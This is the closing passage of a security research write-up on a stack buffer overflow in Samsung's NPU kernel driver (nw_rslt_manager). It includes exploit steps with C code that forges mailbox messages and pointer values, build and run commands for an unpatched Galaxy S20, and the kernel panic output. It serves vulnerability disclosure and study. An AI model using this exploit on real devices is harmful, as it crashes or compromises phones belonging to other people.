The only check performed verifies that the readable size in the buffer (i.e. the difference between the write and read pointers) is at least as large as the message size. Afterwards, the function copies the result from the mailbox buffer into `cmd`, which is a variable defined on the stack in `nw_rslt_manager`.
However, since we have code execution in the NPU, we are able to modify the read/write pointer values as well as the size of the incoming message. We could specify, for example, a message with a length of `0x1000` bytes and set the read/write pointers in such a way that the resulting readable size is `0x1100`. It would pass the condition on the size, but still write `0x1000` bytes into the `0x10`-byte long `cmd` structure, leading to a stack buffer overflow that takes effect once `nw_rslt_manager` returns.
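The missing validation can be illustrated with a small, self-contained sketch. This is a hypothetical hardened copy routine, not the fix Samsung shipped: `copy_command_checked` and `CMD_BUF_SIZE` are names made up for the example, and the destination size of `0x10` is taken from the description above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CMD_BUF_SIZE 0x10 /* size of the destination buffer, as described above */

/*
 * Copies a response of `msg_length` bytes from the mailbox into `dst`.
 * Returns 0 on success and -1 when the request is rejected.
 */
static int copy_command_checked(void *dst, size_t dst_size, const void *src,
                                uint32_t msg_length, uint32_t readable_size) {
    assert(dst != NULL && src != NULL);
    /* Check already present in the driver: enough data in the ring buffer */
    if (readable_size < msg_length)
        return -1;
    /* Additional check assumed here: the destination must be large enough */
    if (msg_length > dst_size)
        return -1;
    memcpy(dst, src, msg_length);
    return 0;
}
```

With a `0x10`-byte destination, the `0x1000`-byte message from the example is rejected even though the readable size of `0x1100` satisfies the first check.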
The exploit for this vulnerability is built upon the previous one, with the only addition being a different payload available here. With full control over the NPU, the idea is to write a payload that will modify the mailbox header and forge an outgoing response to the kernel.
The steps to exploit this vulnerability are as follows:
1. Choose where to write the forged message inside the response mailbox; here we use the offset `0x60`. We can then compute the corresponding address using the beginning of the mailbox region `MAILBOX_START` and the segment offset of the response mailbox `mailbox_hdr->f2hctrl[0].sgmt_ofs`.
#define MAILBOX_START 0x80000
#define CRAFTED_MESSAGE_OFFSET 0x60
struct message *message = (struct message *)( \
    MAILBOX_START - mailbox_hdr->f2hctrl[0].sgmt_ofs + CRAFTED_MESSAGE_OFFSET);
2. Fill in the message and set its length to `0x100`, which will overflow the capacity of the `0x10`-byte `cmd` kernel structure where the response will be stored.
#define MESSAGE_SIZE 0x100
message->magic = MESSAGE_MAGIC;
message->mid = 0;
message->command = COMMAND_DONE;
message->length = MESSAGE_SIZE; /* Size that will overflow the command in the kernel */
message->self = 0x0;
message->data = CRAFTED_MESSAGE_OFFSET + sizeof(struct message); /* The payload is located right after the message */
3. Set the read and write pointers so that the readable size is at least `MESSAGE_SIZE`.
/* Write pointer: points to the end of the crafted message + 0x100 bytes */
mailbox_hdr->f2hctrl[0].wptr = \
    CRAFTED_MESSAGE_OFFSET + sizeof(struct message) + 0x100;
/* Read pointer: points to the beginning of the crafted message */
mailbox_hdr->f2hctrl[0].rptr = CRAFTED_MESSAGE_OFFSET;
At this point, our message is ready to be processed by the kernel. After our payload has been executed by the NPU, it will return gracefully to the command handling function and, along the way, will send an interrupt to the kernel notifying it that a response was received. The kernel will parse it, `memcpy` will copy the payload of size `MESSAGE_SIZE` into `cmd` and, when `nw_rslt_manager` returns, the buffer overflow will trigger.
If you have an unpatched Samsung Galaxy S20 and want to test this exploit, you can try it by first compiling it using the Android NDK and the Makefile provided.
$ make build
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
-Tsymbols.ld -fPIC --target=arm-none-eabi -march=armv7a -nostdlib \
-fpie -ffreestanding -ffunction-sections -fomit-frame-pointer -o \
payload.bin payload.c
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android-objcopy \
-O binary --strip-all payload.bin
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
-o parser_init parser_init.c
You can then push it to a device and run it.
$ make push
// [...]
$ make run
// [...]
adb wait-for-device shell \
su root sh -c "/data/local/tmp/parser_init /data/local/tmp/"
[+] Opening /dev/ion
[+] ION allocation
[+] ION buffer mapping
[+] Opening /dev/vertex10
[+] Loading the payload
The phone should reboot and the following message should be found in /proc/last_kmsg.
$ adb shell su root sh -c "cat /proc/last_kmsg" | grep -A20 "Kernel panic"
<0>[ 7717.705033] [2: npu-proto_AST:23209] Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: nw_rslt_manager+0x2e0/0x2e4
<0>[ 7717.705053] [2: npu-proto_AST:23209] [Exynos][WDT][ EMERG]: watchdog reset is started to 30secs
<6>[ 7717.705075] [2: npu-proto_AST:23209] [Exynos][WDT][ INFO]: TEMP: disable wdt keepalive
<6>[ 7717.705096] [2: npu-proto_AST:23209] [Exynos][WDT][ INFO]: Watchdog cluster 0 stop done, WTCON = 115c18
<6>[ 7717.705120] [2: npu-proto_AST:23209] [Exynos][WDT][ INFO]: s3c2410wdt_multistage_wdt_start: count=0x0000b32b, wtcon=00115c3c
<6>[ 7717.705135] [2: npu-proto_AST:23209] [Exynos][WDT][ INFO]: Watchdog cluster 0 start, WTCON = 115c39
<4>[ 7717.705147] [2: npu-proto_AST:23209] secdbg_wdd_set_start: wdd_info->init_done: true
<6>[ 7717.705162] [2: npu-proto_AST:23209] debug-snapshot: item - log_kevents is disabled
<3>[ 7717.705187] [2: npu-proto_AST:23209] mif: s5100_send_panic_noti_ext: Send CMD_KERNEL_PANIC message to CP
<3>[ 7717.705202] [2: npu-proto_AST:23209] mif: pcie_send_ap2cp_irq: Reserve doorbell interrupt: PCI not powered on
<6>[ 7717.705244] [2: npu-proto_AST:23209] mif: mif_gpio_set_value: SET GPIO AP2CP_WAKE_UP = 1 (wait 0ms, dup 0)
<4>[ 7717.707221] [2: npu-proto_AST:23209] CPU: 2 PID: 23209 Comm: npu-proto_AST FTT: 0 0 Tainted: G S W 4.19.87 #1
<4>[ 7717.707235] [2: npu-proto_AST:23209] Hardware name: Samsung X1SLTE EUR OPEN 21 based on EXYNOS990 (DT)
<4>[ 7717.707246] [2: npu-proto_AST:23209] Call trace:
<4>[ 7717.707263] [2: npu-proto_AST:23209] dump_backtrace+0x0/0x1b0
<4>[ 7717.707281] [2: npu-proto_AST:23209] show_stack+0x14/0x20
<4>[ 7717.707296] [2: npu-proto_AST:23209] dump_stack+0xd4/0x110
<4>[ 7717.707311] [2: npu-proto_AST:23209] panic+0x174/0x2dc
<4>[ 7717.707328] [2: npu-proto_AST:23209] __stack_chk_fail+0x18/0x1c
<4>[ 7717.707343] [2: npu-proto_AST:23209] nw_rslt_manager+0x2e0/0x2e4
<2>[ 7717.707365] [2: npu-proto_AST:23209] SMP: stopping secondary CPUs : SYSTEM_RUNNING
This short article concludes this series about Samsung's Neural Processing Unit implementation. This journey started from an opaque binary embedded inside Samsung's firmware and ended with an in-depth understanding of this component, as well as primitives that could be used in a privilege escalation exploit (although we're pretty far away from an actual LPE).
It's very likely that there are multiple bugs still lurking in the codebase of the NPU, especially in functions handling machine learning computations, since they are pretty complex and handle a lot of user input. The lack of security mitigations in the NPU also makes exploitation there trivial. Thankfully, the kernel does implement mitigations and has limited interactions with the NPU, which greatly reduces the chances of a successful kernel compromise from the NPU.
SVE-2021-20204
SVE-2021-21074
Copyright © Impalabs 2021-2023